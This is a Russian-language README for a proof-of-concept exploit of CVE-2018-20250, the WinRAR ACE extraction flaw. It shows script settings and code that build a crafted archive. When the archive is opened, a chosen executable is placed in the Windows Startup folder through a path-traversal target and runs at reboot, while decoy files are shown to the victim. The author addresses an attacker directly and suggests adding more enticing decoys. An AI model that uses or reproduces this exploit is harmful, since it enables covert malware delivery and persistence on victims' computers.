
Автоматизированный скрипт эксплойта для CVE-2018-20250 (выполнение кода при извлечении ACE в WinRAR), который генерирует вредоносный архивный файл, внедряющий полезную нагрузку в папку автозагрузки Windows.
эксплойт для Извлечения выполнения кода из Winrar
poc от Ridter
как использовать?
вам просто нужно установить Python 3.7 и подготовить вредоносный файл, который хотите запустить, задать нужные значения, этот скрипт эксплойта автоматически сгенерирует вредоносный архивный файл!
... ...
# Имя создаваемого архивного файла
rar_filename = "test.rar"
# Вредоносный файл, который нужно запустить
evil_filename = "calc.exe"
# Путь распаковки, который вы хотите, например, как показано ниже
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Другие файлы, которые будут отображаться при открытии winrar жертвой
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# Эта команда может отличаться, в зависимости от вашего окружения Python3.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
запустите эксплойт, эксплойт автоматически сгенерирует test.rar
если жертва откроет test.rar, она увидит файлы hello.txt и world.txt; вы также можете добавить больше файлов, более привлекательных.
![]()
hi.exe, на самом деле это calc.exe. При перезагрузке компьютера hi.exe запустится.![]()
веселитесь! :)